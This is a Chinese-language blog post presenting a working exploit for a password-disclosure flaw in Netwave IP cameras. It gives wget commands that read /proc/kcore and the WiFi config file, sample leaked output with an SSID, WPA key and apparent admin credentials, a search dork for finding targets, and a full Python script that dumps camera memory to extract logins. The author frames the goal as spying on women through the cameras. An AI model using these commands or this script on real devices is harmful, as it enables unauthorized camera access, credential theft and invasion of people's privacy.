Netwave IP Camera Password Disclosure

前言:今早创宇上看到的一篇Netwave摄像头漏洞,然后脑补上帝视角看看妹子,可惜搞完了才发现童话里都是骗人的,木有妹子啊。。。

0x01 简介

Netwave网络摄像头的一个文件下载导致配置信息被泄露。


0x02 分析

主要就是下载配置文件,然后解析配置,这里引用知道创宇的分析

wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
wget -qO- http://[HOST]:[PORT]//dev/rom0
wget -qO- http://[HOST]:[PORT]/get_status.cgi

  • get_status.cgi[泄露当前网络摄像头的一些配置信息]

    var sys_ver='21.37.2.47';  
    var app_ver='0.0.4.19';
    var alias='002voam';
    var now=1486976881;
    var tz=-28800;
    var alarm_status=0;
    var ddns_status=0;
    var ddns_host='';
    var oray_type=0;
    var upnp_status=0;
    var p2p_status=0;
    var p2p_local_port=20409;
    var msn_status=0;
    var wifi_status=0;
    var temperature=0.0;
    var humidity=0;
    var tridro_error='';
  • /etc/RT2870STA.dat[获取SSID与wifi密码的配置文件]

    [Default]
    SSID=hang yue office
    NetworkType=Infra
    Channel=0
    AuthMode=WPA2PSK
    EncrypType=AES
    WPAPSK=hangyuewifi
  • /proc/kcore[内存的map, (下载之前需要注意把wget进程结束才可以登录)。]

    000DC5D9ADF4
    IPCam
    admin
    Apex27212600
    john
    ...

0x03 Poc&Exp

exploits上已经公开了源码,简单的做了点修改

# -*- coding:utf-8 -*-
# !/usr/bin/env python
# Desc: Netwave IP Camera Password Disclosure
# Dork: Netwave IP camera http config | "Server: Netwave IP Camera"
# Referer: http://paper.seebug.org/225/


import sys, os, time, urllib2, requests, subprocess, signal

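try:
    import tailer
except ImportError:
    # Only dump() calls tailer.follow(); the other probes run without it,
    # so this is a warning rather than a hard exit. A bare ``except`` here
    # would also have hidden unrelated errors raised while importing.
    print " [+] Please sudo pip install tailer first"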


class bcolors:
    """ANSI SGR escape sequences used to colour terminal output.

    Usage is ``bcolors.OKGREEN + text + bcolors.ENDC``; ``ENDC`` resets
    every attribute set by the other constants.
    """
    # foreground colours (bright variants)
    HEADER = '\033[95m'    # magenta
    OKBLUE = '\033[94m'    # blue
    OKGREEN = '\033[92m'   # green
    WARNING = '\033[93m'   # yellow
    FAIL = '\033[91m'      # red
    # text attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # reset everything
    ENDC = '\033[0m'


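class Scanner(object):
    """Probe one Netwave camera for the unauthenticated file-disclosure issue.

    ``url`` is the ``HOST:PORT`` string from the command line; every request
    is built as ``http://<url>/...`` from it. State carried between steps:

    * ``macaddr``   -- value of the ``var id='...'`` line of ``get_status.cgi``
    * ``done``      -- position (0-4) in the window of lines printed once the
                       MAC address is seen in the ``strings`` output
    * ``linecount`` -- lines of ``strings`` output consumed while searching
    * ``_procs``    -- child processes started by :meth:`dump`, so the SIGINT
                       handler can stop exactly those (they are started in
                       their own session via ``os.setsid``) instead of every
                       ``wget``/``tail`` on the machine

    Fixes relative to the original listing: the SIGINT handler takes
    ``self`` (a bound two-parameter handler raised TypeError on CTRL+C),
    ``dump`` uses ``self.url`` instead of ``sys.argv[1]``, subprocesses get
    argument lists instead of shell strings (so ``HOST:PORT`` cannot inject
    shell syntax), requests carry a timeout, the ``open()`` in ``dump`` is
    closed, and bare ``except`` clauses are narrowed.
    """

    TMP_STREAM = 'tmpstream.txt'    # raw bytes of //proc/kcore as wget receives them
    TMP_STRINGS = 'tmpstrings.out'  # ``strings`` output of TMP_STREAM, appended live
    TIMEOUT = 10                    # seconds; constructed value, the original had none

    def __init__(self, url):
        self.url = url
        self.macaddr = ""
        self.done = 0
        self.linecount = 0
        self._procs = []

    def signal_handler(self, signum, frame):
        """SIGINT handler: stop our child processes, drop temp files, exit 0.

        Only the process groups this instance started are signalled; each
        child was created with ``preexec_fn=os.setsid`` so its pgid equals
        its pid. Files that were never created are ignored.
        """
        print('\nclearing up..')
        for proc in self._procs:
            try:
                os.killpg(proc.pid, signal.SIGKILL)
            except OSError:
                pass  # child already gone
        for name in (self.TMP_STREAM, self.TMP_STRINGS):
            try:
                os.remove(name)
            except OSError:
                pass  # never written or already removed
        sys.exit(0)

    def mac(self):
        """Fetch ``get_status.cgi`` and return the ``var id='...'`` value.

        Returns ``self.macaddr`` unchanged (initially ``""``) when the
        request fails or no ``var id=`` line with a quoted value is present.
        """
        print self.url
        try:
            r = requests.get('http://' + self.url + '/get_status.cgi',
                             timeout=self.TIMEOUT)
        except requests.RequestException:
            return self.macaddr
        for line in r.content.split(";\n"):
            if line.startswith("var id="):
                parts = line.split("'")
                if len(parts) > 1:  # value sits between the first pair of quotes
                    self.macaddr = parts[1]
        return self.macaddr

    def wifi(self):
        """Print ``//etc/RT2870STA.dat``; SSID and WPAPSK lines are highlighted.

        Returns ``""`` in every case so ``scan`` can print the result inline.
        A failed request is reported as the wireless LAN being disabled.
        """
        try:
            r = requests.get("http://" + self.url + "//etc/RT2870STA.dat",
                             timeout=self.TIMEOUT)
        except requests.RequestException:
            print "[+] Wireless Lan Disabled"
            return ""
        for line in r.content.split("\n"):
            if line.startswith(("WPAPSK", "SSID")):
                print "\t\t" + bcolors.OKGREEN + str(line) + bcolors.ENDC
            else:
                print "\t\t" + str(line)
        return ""

    def memory(self):
        """Check that ``//proc/kcore`` answers; exit the program if it does not.

        Only the response headers are needed, so the connection is closed
        immediately (the original left it open). ``urllib2.URLError`` and
        ``HTTPError`` are ``IOError`` subclasses; ``ValueError`` covers a
        malformed URL.
        """
        try:
            resp = urllib2.urlopen('http://' + self.url + '//proc/kcore',
                                   timeout=self.TIMEOUT)
            resp.close()
        except (IOError, ValueError):
            print bcolors.FAIL + "[+]VulnInfo: Not found vuln,and exiting.." + bcolors.ENDC
            sys.exit(0)
        return bcolors.WARNING + "Found vuln,Please wait for some minutes to dump.." + bcolors.ENDC

    def dump(self):
        """Stream ``//proc/kcore`` to TMP_STREAM, run ``strings`` over it as it
        grows, and hand each resulting line to :meth:`_handle_line`.

        Equivalent to the original shell pipelines
        ``wget -qO- URL > tmpstream.txt`` and
        ``tail -f tmpstream.txt | strings >> tmpstrings.out`` but without a
        shell, and with the children recorded in ``_procs`` for cleanup.
        """
        with open(self.TMP_STREAM, 'wb') as stream_out:
            wget = subprocess.Popen(
                ["wget", "-qO-", "http://" + self.url + "//proc/kcore"],
                stdout=stream_out, preexec_fn=os.setsid)
        self._procs.append(wget)
        with open(self.TMP_STRINGS, 'w') as strings_out:
            strings_out.write("\n")  # matches the original ``echo "" >`` seed
        time.sleep(1)
        with open(self.TMP_STRINGS, 'a') as strings_out:
            tail = subprocess.Popen(["tail", "-f", self.TMP_STREAM],
                                    stdout=subprocess.PIPE, preexec_fn=os.setsid)
            strings_proc = subprocess.Popen(["strings"], stdin=tail.stdout,
                                            stdout=strings_out, preexec_fn=os.setsid)
        tail.stdout.close()  # let ``strings`` own the read end of the pipe
        self._procs.extend([tail, strings_proc])
        print bcolors.BOLD + "hit CTRL+C to exit.." + bcolors.ENDC
        # Wait until ``strings`` has produced more than the seed line; show the
        # raw byte count meanwhile. The short sleep keeps this from spinning.
        while os.stat(self.TMP_STRINGS).st_size <= 1024:
            sys.stdout.write("binary data: " + str(os.stat(self.TMP_STREAM).st_size) + "\r")
            sys.stdout.flush()
            time.sleep(0.1)
        print "strings in binary data found.. password should be around line 10000"
        with open(self.TMP_STRINGS, 'r') as strings_in:
            for line in tailer.follow(strings_in):
                self._handle_line(line)

    def _handle_line(self, line):
        """Advance the line window: state 0 searches for the MAC address, states
        1-4 print the next four lines under the labels the original used."""
        if self.done == 0:
            self.linecount += 1
            if line == self.macaddr:
                self.done = 1
                print bcolors.OKGREEN + "\n\nmac address triggered.. printing the following dumps, could leak username and passwords.." + bcolors.ENDC
            else:
                sys.stdout.write(str(self.linecount) + "\r")
            sys.stdout.flush()
            return
        labels = {
            1: "\nfirstline: ",
            2: "username: ",
            3: "password: ",
            4: "following line: \n\n",
        }
        label = labels[self.done]
        self.done = 0 if self.done == 4 else self.done + 1  # wrap back to searching
        print label + bcolors.OKGREEN + line + bcolors.ENDC
        sys.stdout.flush()

    def scan(self):
        """Install the SIGINT handler, run the three probes, then start the dump."""
        signal.signal(signal.SIGINT, self.signal_handler)
        print "[+]SystemInfo:\n\t\tMac-Address=" + bcolors.OKGREEN + str(self.mac()) + bcolors.ENDC
        print
        print "[+]WifiInfo:\n", self.wifi()
        print
        print "[+]VulnInfo:\n\t\t", self.memory()
        self.dump()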

if __name__ == '__main__':
    # A single argv entry means no target was given.
    if len(sys.argv) < 2:
        print '[+]Usage: python Netwave_IP_Camera.py [HOST]:[PORT]'
        sys.exit(0)
    Scanner(sys.argv[1]).scan()
    # Keep the process alive for the SIGINT handler installed by scan().
    signal.pause()


PS:使用过程中如果要访问目标站,记得先把代码停掉;如果解析密码时间过长,停下来清空wget进程后重新运行即可。不过这种摄像头发现很多都是用在商业之类上的,还没有语音对话功能,也不能吓人,没意思= =。